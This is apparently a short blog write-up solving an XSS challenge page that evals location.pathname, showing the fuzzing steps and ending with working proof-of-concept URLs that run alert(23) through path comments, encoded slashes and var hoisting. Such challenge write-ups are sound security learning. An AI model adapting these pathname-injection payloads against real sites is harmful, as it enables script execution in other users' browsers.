while surfing the internet for some sec news, a xss challenge came across.
challenge address https://renwax23.github.io/X/chal/oct22/
It’s on github. So there is no backend, all the codes are in the front. Let’s see it.
if(/\/chal\/oct22\//.test(location.pathname.substr(0,15))){
eval(location.pathname)
}
The logic is simple. After checking the location.pathname, pathname will be evaled. So this is the sink.
round one
https://renwax23.github.io/X/chal/oct22/ Check the console. We see a syntax error. ` Uncaught SyntaxError: Invalid regular expression flags at (index):23 ` So i think that the key is regex. After reading some docs about regex, I couldn’t get an answer.
I tried some random stuff.-
&
?
\
, and get 404.
round one failed.
round two
So I need to get code 200 and insert some code in the url.
But how? Some are urlencoded. Some will return code 404. I fuzzed the url to see what I can insert while it still returns 200. No luck.
https://renwax23.github.io/X/chal/oct22//
I add a /
in the url. And it returned 200. So I can insert /
as I need.
https://renwax23.github.io//X/chal/oct22/
I add a /
in the front. Checking the console, there’s no syntax error. I thought that it’s the right way. So I need to get some line break. Because //
comment the code. Trying ‘%0d%0a’ and \u2028
(from prompt(1) to win), they are urlencoded.
I also tried a/../
. But chrome will short it.
Trying some urlencode. And https://renwax23.github.io//X/chal/oct22/a/..%2f
returns code 200.
Eureka!
Now I can inject code into pathname and I still get code 200.
round three
But there’s still no alert.
https://renwax23.github.io/X//chal/oct22/a/..%2f
So I moved /
. New error.
Uncaught SyntaxError: Unexpected token '.'
Not regex syntax error.
So now I need to get the syntax right. After some trying, I get a new error message. https://renwax23.github.io/X//chal/oct22/a;//..%2f
Uncaught ReferenceError: chal is not defined
So we need to need to define chal
. And in javascript, you can use before define. So we can use var
to define. I tried var chal
. Space will be %20. Syntax error.
We can use comment /**/
to seperate.
In the end, we get the alert. poc: https://renwax23.github.io/X//chal/oct22/-alert(23);var//..%2f/..%2f//chal=1;var//..%2f/..%2f/..%2f//oct22=2//..%2f/..%2f
Sereval hours later. I tried again. And get a less one. https://renwax23.github.io/X//chal/oct22/alert(23);var//..%2f..//chal,oct22//..%2f..
Really interesting challenge. Thanks to the author.